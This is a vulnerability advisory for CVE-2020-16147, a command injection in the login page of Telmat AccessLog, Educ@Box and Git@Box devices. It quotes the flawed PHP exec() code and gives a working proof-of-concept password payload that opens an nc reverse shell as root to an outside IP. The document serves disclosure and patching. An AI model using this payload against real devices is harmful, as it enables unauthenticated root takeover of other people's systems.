CVE-2020-16147 - Telmat - Unauthenticated root RCE

  • Title : Telmat - Unauthenticated root Remote Code Execution
  • Author : @Podalirius
  • CVSS : 10 (Critical)
  • CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

An unauthenticated code injection on the login page of Telmat AccessLog, Gît@Box and Educ@Box with software version <= 6.0 (TAL_20180415) allows Remote Code Execution (RCE) as root.

Affected products :

Manufacturer Model Software version
TelMat AccessLog <= 6.0 (TAL_20180415)
TelMat Educ@Box <= 6.0 (TAL_20180415)
TelMat Gît@Box <= 6.0 (TAL_20180415)

Exploitation

This vulnerability was tested on a Telmat AccessLog 6.0 (TAL_20180415):

During a pentest, I found the login page of the AccessLog. I tried to perform SQL injections on the login and password fields to bypass the authentication mechanism. I noticed that the login page had an unexpected behavior when the password contained a single quote '. The login page was replaced by a progress bar for about 10 to 15 minutes for all clients. (This could lead to a denial of service)

Using the Authenticated RCE I found earlier, I extracted the contents of the login page /authent.php. After analyzing how the authentication mechanism works, I found this interesting part (lines 56 to 72 in file /authent.php) :

if(isset($cpasswd)) {
  unset($res);
  if(strstr($cpasswd,"$apr1$")) {
    $dpsd = explode("$",$cpasswd);
    $salt = $dpsd[2];
    $cmd = "/usr/bin/openssl passwd -apr1 -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
    exec($cmd,$res,$cr);
    $ccpasswd = trim($res[0]);
  } else {
    $salt = mb_substr($cpasswd,0,2);
    $cmd = "/usr/bin/openssl passwd -crypt -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
    exec($cmd,$res,$cr);
    $ccpasswd = trim($res[0]);
  }
  // ...
}

We can see that the content of the whois_pas variable in the POST request is appended directly to the command line, unfiltered. We now only need to close the single quote ' and add a semicolon ; and we can inject shell commands directly. At the end of our injection, we add a # in order to comment out the rest of the command line.

Proof of concept reverse shell :

In order to get a reverse shell I used the following payload :

Name Content
Login (whois_adm) poc
Password (whois_pas) '; nc -e /bin/sh 1.2.3.4 4444 #

We now have an unauthenticated RCE, furthermore also running as root :

Mitigations

In order to patch this vulnerability you need to update your firmware to the latest version.